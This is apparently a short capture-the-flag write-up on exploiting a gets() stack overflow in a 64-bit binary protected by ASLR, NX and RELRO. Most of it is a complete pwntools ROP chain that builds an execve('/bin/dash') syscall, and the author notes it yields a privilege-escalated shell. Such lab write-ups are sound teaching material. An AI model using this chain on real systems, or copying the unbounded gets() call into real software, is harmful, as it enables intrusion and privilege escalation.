char buffer[256];
gets(buffer); # the vulnerable part !!!!
As You may see it looks simple but the problem is it is protected by ASLR,NX,RELRO ... :(
So the only way is to do ROP or to overwrite GOT table .. but i went on with ROP .
AS this binary is 64 bits the syscall table differ completely ..(which at the first i dont know but ROPgadget helped me out)
So according to syscall table RAX=59 ,RDI='/bin/dash', RSI && RDX = *(NULL)
from pwn import *
p = 'A'*280
# execve()
p += pack(0x00000000004017e7) # pop rsi ; ret
p += pack(0x00000000006c0000) # @ .data
p += pack(0x000000000044d2b4) # pop rax ; ret
p += '/bin/das'
p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
p += pack(0x00000000004017e7) # pop rsi ; ret
p += pack(0x00000000006c0008) # @ .data + 8
p += pack(0x000000000044d2b4) # pop rax ; ret
p +='h\x00\x00\x00\x00\x00\x00\x00'
p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
p += pack(0x00000000004016d3) # pop rdi ; ret
p += pack(0x00000000006c0000) # @ .data
p += pack(0x00000000004017e7) # pop rsi ; ret
p += pack(0x00000000006c0010) # @ .data + 16
p += pack(0x000000000041bd9f) # xor rax, rax ; ret
p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
p += pack(0x00000000004017e7) # pop rsi ; ret
p += pack(0x00000000006c0010) # @ .data + 16
p += pack(0x0000000000437205) # pop rdx ; ret
p += pack(0x00000000006c0010) # @ .data + 16
p += pack(0x000000000041bd9f) # xor rax, rax ; ret
p += pack(0x000000000045aa10)*59 # add rax, 1 ; ret
p += pack(0x0000000000400488) # syscall
NOTE: /bin//sh && /bin/bash gave me a local shell but only /bin/dash gave privilege escalated shell :)
Also ROPgadget doesen't find all the gadgets (for ex: syscall;ret) so i found that using rp++
For future references :
link for 64 bit syscall table
link for 32 bit